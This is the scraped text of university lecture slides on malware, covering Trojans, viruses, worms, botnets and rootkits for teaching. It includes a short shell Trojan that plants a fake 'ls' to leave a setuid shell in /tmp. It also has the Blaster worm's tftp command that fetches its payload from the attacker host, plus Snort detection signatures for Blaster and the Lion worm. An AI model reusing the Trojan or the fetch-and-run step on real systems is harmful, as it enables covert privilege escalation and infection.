• No results found

Operating Systems Principles

N/A
N/A
Info
Download
Protected

Academic year: 2021

Share "Operating Systems Principles"

Copied!
28
0
0

Loading.... (view fulltext now)

Download now ( 28 Page )

Full text

(1)

Malware

CSC501

(2)

A Quick Recap

q

Previous Lecture

Q

Code Injection Attacks

q

Today:

Q

Malware

(3)

What is Malicious Software?

q

Malicious Software (a.k.a. Malware)

Q

Software designed to infiltrate or damage a

computer system, without the owner's

informed consent

-- http://en.wikipedia.org/wiki/Malware

Q

Examples:

Ø

Viruses, worms, Trojan horses, spyware, and

other malicious and unwanted software

Q

How about adware?

q

Malware references the intent of the

creator, rather than any particular features

(4)

Blaster

Nimda

CodeRed

Source: Symantec Internet Security Threat Report

q

Malware remains a top threat

Why should we care?

Conficker

Worm Infection Map (as of 4/1/09) from CWG

(5)

q

Recruiting Vulnerable Nodes è

Attack Network

Q

Zero-day

exploits w/o software patches

Q

New

attack strategies

Ø Exploiting vulnerable client-side software, such as IE Ø Propagating malware with RFID tags, cell phones…

Q

Fast massive

replications

q

Providing “Value-Added” Services

Q

DDoS, spamming, or other malicious purposes …

Q

Sell/rent attack networks for profit

(6)

Taxonomy of Malicious Software

backdoors Logic Bombs Trojan Horses Viruses Worms Zombies Malicious Programs Needs Host Program Replicate Rootkits Independent

(7)

Backdoor

q

Secret entry point into a system

Q

Specific user identifier or password that

circumvents normal security procedures.

q

Commonly used by developers

(8)

Logic Bomb

q

Embedded in legitimate programs

q

Activated when specified conditions

met

Q

E.g., presence/absence of some file;

Particular date/time or particular user

q

When triggered, typically damages

system

(9)

Trojan Horse

q Attacker:

cat >/homes/victim/ls <<eof

cp /bin/sh /tmp/.xxsh

chmod u+s,o+x /tmp/.xxsh

rm ./ls

ls $*

eof

q Victim

ls

q

Program with an expected

and hidden effect

Q Appears normal/expected Q hidden effect violates

security policy

q

User tricked into executing

Trojan horse

Q Expects (and sees)

expected behavior

Q Hidden effect performed

(10)

Virus

q

Self-replicating code

Q

Alters normal code with “infected” version

Q

Generally tries to remain undetected

q

Operates when infected code executed

If spread condition

then

For target files

if not infected then alter to include virus

Perform malicious action

(11)

Worm

q

Runs independently

Q

Does not require a host program

q

Propagates a fully working version of itself

to other machines

q

Carries a payload performing hidden tasks

Q

Backdoors, spam relays, DDoS agents; …

q

Phases

(12)

Worm Propagation

A Worm

A Victim

1:Target Probing 2: Vulnerability Exploitation 3: Replication

(13)

MSBlast Worm (Aug., 2003)

192.168.0.1

Blaster

Target/RPC

192.168.10.11

1. Exploits target on port 135/TCP 2. Binds svchost.exe to port

4444/TCP via injected code

3. Connects to target on port 4444/TCP

4. Creates a shell “cmd.exe” and binds it to port 4444/TCP

5. Creates “TFTP Server” on port 69/UDP 6. Sends “TFTP” command to shell

7. Runs TFTP command; “teleports” msblast.exe file

8. Sends “START msblast.exe” command 9. Runs worm on target!

10. Closes connection

>tftp –I 192.168.0.1 GET msblast.exe

11. Shell closes

alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

(14)

Example II : Lion/Linux Worm

192.168.0.1

Lion

Target/BIND

192.168.10.11

1. Checks reach-ability by connecting 53/TCP 2. Exploit target on port 53/TCP

3. Runs a shell command 4. Runs worm on target!

3. Replicate worms on port 27374/TCP

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)

alert tcp $HOME_NET any -> $EXTERNAL_NET 27374

(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)

alert tcp $HOME_NET any -> $EXTERNAL_NET 27374

(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)

(15)
(16)

Zombie

q

Secretly takes over another

networked computer by exploiting

software flows

q

Builds the compromised computers

into a zombie network or botnet

q

Uses it to indirectly launch attacks

(17)

Detailed Steps (1)

Unsecured Computers Attacker

Attacker scans Internet for

unsecured systems that can be compromised

1

(18)

Detailed Steps (2)

Unsecured Computersbie Attacker

Internet

Attacker secretly

installs zombie agent programs, turning

unsecured computers into zombies

2

(19)

Detailed Steps (3)

Attacker

Internet

Zombie agents Zombie agents ``phone home’’ and connect to a master server

3

Zombies Master Server

(20)

Detailed Steps (4)

Attacker

Internet

Zombies Master Server

Attacker sends commands to Master Server to launch a DDoS attack against

a targeted system

(21)

Internet

Detailed Steps (5)

Attacker Zombies Master Server Master Server sends signal to zombies to launch attack on targeted system

5

Targeted System System

(22)

Internet

Detailed Steps (6)

Attacker Zombies Master Server Targeted system is overwhelmed by zombie requests, denying requests from normal users

6

Targeted System System User Request Denied

(23)

Rootkit

q

“A rootkit is a set of programs and

code that allows a permanent or

consistent, undetectable presence on

a computer”

q

Goals:

Q Hide malicious resources

(

e.g.,

processes, files, registry keys, open ports, etc.

)

(24)

_ _ ____ _ _ _ _ ___ ___ ___ | | (_)_ __ _ ___ __ | _ \ ___ ___ | |_| | _(_) |_ |_ _|_ _|_ _| | | | | '_ \| | | \ \/ / | |_) / _ \ / _ \| __| |/ / | __| | | | | | | | |___| | | | | |_| |> < | _ < (_) | (_) | |_| <| | |_ | | | | | | |_____|_|_| |_|\__,_/_/\_\ |_| \_\___/ \___/ \__|_|\_\_|\__| |___|___|___|

ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing

netstat Trojaned! Hide connections chfn Trojaned! User->r00t

chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access passwd Trojaned! User->r00t

ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs

linsniffer Packet sniffer! fix File fixer!

z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor!

lled lastlog editor!

bindshell port/shell type daemon!

(25)

Rootkit

q

Simple rootkits:

Q

Modify user programs (ls, ps)

Q

Detectable by tools like Tripwire

q

Sophisticated rootkits:

Q

Modify the kernel itself

(26)

Rootkit Classification

Kernel

Trojan login Trojan ps Trojan ifconfig good tripwire Kernel-level RootKit

Kernel

good login good ps good ifconfig good tripwire Trojan Kernel Module

Application-level Rootkit (I) Application-level Rootkit (II)

Kernel

Evil Program good program good program good program good program

Shadow Walker, adore Hxdef, NTIllusion

(27)

Rootkit Classification

Under-Kernel RootKit

Kernel

good login good ps good ifconfig good tripwire Evil VMM

(28)

Next Lecture

References

Download now ( PDF - 28 Page - 572.18 KB )

Related documents